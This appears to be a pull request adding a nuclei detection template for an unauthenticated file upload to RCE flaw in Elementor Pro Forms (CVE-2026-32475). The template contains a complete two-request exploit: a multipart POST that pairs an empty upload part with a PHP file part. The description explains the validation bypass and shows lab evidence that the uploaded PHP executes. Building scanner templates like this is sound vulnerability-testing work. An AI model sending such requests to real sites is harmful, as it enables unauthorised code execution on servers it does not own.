### PR TITLE
Add CVE-2026-32475: Elementor Pro <= 4.2.1 unauth arbitrary file upload to RCE (full PoC template)

### DIFF
--- a/http/cves/2026/CVE-2026-32475.yaml
+++ b/http/cves/2026/CVE-2026-32475.yaml
@@ -1,0 +1,113 @@
+id: CVE-2026-32475
+
+info:
+  name: Elementor Pro <= 4.2.1 - Unauthenticated Arbitrary File Upload to RCE
+  author: Boreas37
+  severity: critical
+  description: |
+    The Forms module of the Elementor Pro plugin for WordPress (<= 4.2.1) handles
+    each uploaded entry in two separate passes with inconsistent loop behavior:
+    validation() aborts on the first entry whose error is UPLOAD_ERR_NO_FILE, so a
+    .php entry submitted after an empty entry is never type-checked, while
+    process_field() merely skips the empty entry and still moves every subsequent
+    one into the public wp-content/uploads/elementor/forms/ directory. An
+    unauthenticated attacker can submit two multipart parts for the same upload
+    field - a blank first part followed by a PHP payload - resulting in arbitrary
+    file upload and remote code execution under the web server user.
+  impact: |
+    Unauthenticated attackers can upload arbitrary files, including PHP scripts,
+    and achieve remote code execution on affected WordPress installations running
+    a vulnerable version of Elementor Pro with any published form containing a
+    File Upload field.
+  remediation: |
+    Update Elementor Pro to version 4.2.2 or later. Until then, remove File Upload
+    fields from publicly reachable forms or restrict form submissions via WAF.
+  reference:
+    - https://patchstack.com/articles/critical-unauthenticated-file-upload-to-rce-in-elementor-pro-plugin/
+    - https://wpscan.com/blog/critical-unauthenticated-file-upload-to-rce-in-elementor-pro-plugin/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-32475
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-32475
+    cwe-id: CWE-434
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: "wp-plugin:elementor-pro"
+  tags: cve,cve2026,wordpress,wp-plugin,elementor,rce,file-upload,unauth,intrusive
+
+http:
+  - raw:
+      - |
+        GET /?page_id=6 HTTP/1.1
+        Host: {{Hostname}}
+    extractors:
+      - type: regex
+        name: post_id
+        internal: true
+        group: 1
+        regex:
+          - 'name="post_id" value="([0-9]+)"'
+      - type: regex
+        name: form_id
+        internal: true
+        group: 1
+        regex:
+          - 'name="form_id"[^>]*value="([^"]+)"'
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=nb
+
+        --nb
+        Content-Disposition: form-data; name="action"
+
+        elementor_pro_forms_send_form
+        --nb
+        Content-Disposition: form-data; name="post_id"
+
+        {{post_id}}
+        --nb
+        Content-Disposition: form-data; name="form_id"
+
+        {{form_id}}
+        --nb
+        Content-Disposition: form-data; name="queried_id"
+
+        {{post_id}}
+        --nb
+        Content-Disposition: form-data; name="referer_title"
+
+        poc
+        --nb
+        Content-Disposition: form-data; name="form_fields[name]"
+
+        poc
+        --nb
+        Content-Disposition: form-data; name="form_fields[email]"
+
+        poc@example.com
+        --nb
+        Content-Disposition: form-data; name="form_fields[dosya][]"; filename=""
+
+
+        --nb
+        Content-Disposition: form-data; name="form_fields[dosya][]"; filename="{{randstr}}.php"
+
+        <?php echo "{{randstr}}"; ?>
+        --nb--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success":false'
+      - type: word
+        part: body
+        negative: true
+        words:
+          - 'This file type is not allowed.'


### PR DESCRIPTION
## Template

Full PoC template for **CVE-2026-32475** (CVSS 9.0 critical, CWE-434) — unauthenticated arbitrary file upload to RCE in the Elementor Pro Forms module (<= 4.2.1). Requested as a follow-up to #16956, which was closed as version-detection only.

### Detection logic (2 requests)

1. `GET` the form page and extract `post_id` / `form_id` from the rendered Elementor form.
2. `POST` multipart to `admin-ajax.php` with TWO parts on the same upload field: an empty first part (`UPLOAD_ERR_NO_FILE`) + a `.php` payload part.

**Root cause:** in <= 4.2.1, `validation()` early-returns on the empty entry so the `.php` part is never type-checked, while `process_field()` skips empties and still moves the payload into `wp-content/uploads/elementor/forms/`.

**Matcher:** vulnerable servers process the request without surfacing any file-type rejection — matcher asserts `"success":false` present AND `This file type is not allowed.` ABSENT (negative word matcher). On patched behavior the file-type rejection appears in `errors`, so the negative matcher fails and no detection fires.

### Verification

| Test | Target | Result |
|---|---|---|
| Validate | nuclei v3.11.0 | PASS - all templates validated |
| Positive | WordPress 6.8 + Elementor Pro 3.28.1 (local Docker lab, ARM64) | detected |
| Disk proof | same lab after template run | `wp-content/uploads/elementor/forms/<uniqid>.php` written (verified via container exec); requesting it executes PHP |
| Negative | patched-behavior instance (validation loop fixed: skip-empty instead of early-return; returns "This file type is not allowed." in errors) | 0 results |

Positive run output:

```
[CVE-2026-32475] [http] [critical] http://localhost:8090/wp-admin/admin-ajax.php
```

Post-run disk state on the lab target:

```
-rw-r--r-- 1 www-data www-data 44 ... /var/www/html/wp-content/uploads/elementor/forms/6a8d85a080ef2.php
$ curl .../forms/6a8d85a080ef2.php
3IPIGM4ZKI0D6RVvmAsVi4zVlsN   <- randstr marker executed as PHP
```

Negative run output (patched behavior): no results.

Note: the patched-behavior negative test was performed against an instance with the 4.2.2 fix logic applied (early-return replaced with continue), since no redistributable 4.2.2 package was available for the lab. The response contract used by the matcher is exactly what the patched code path produces (`errors.dosya = "This file type is not allowed."`).

### References

- https://patchstack.com/articles/critical-unauthenticated-file-upload-to-rce-in-elementor-pro-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2026-32475
- Working exploit + verified template: https://github.com/Boreas37/CVE-2026-32475-PoC
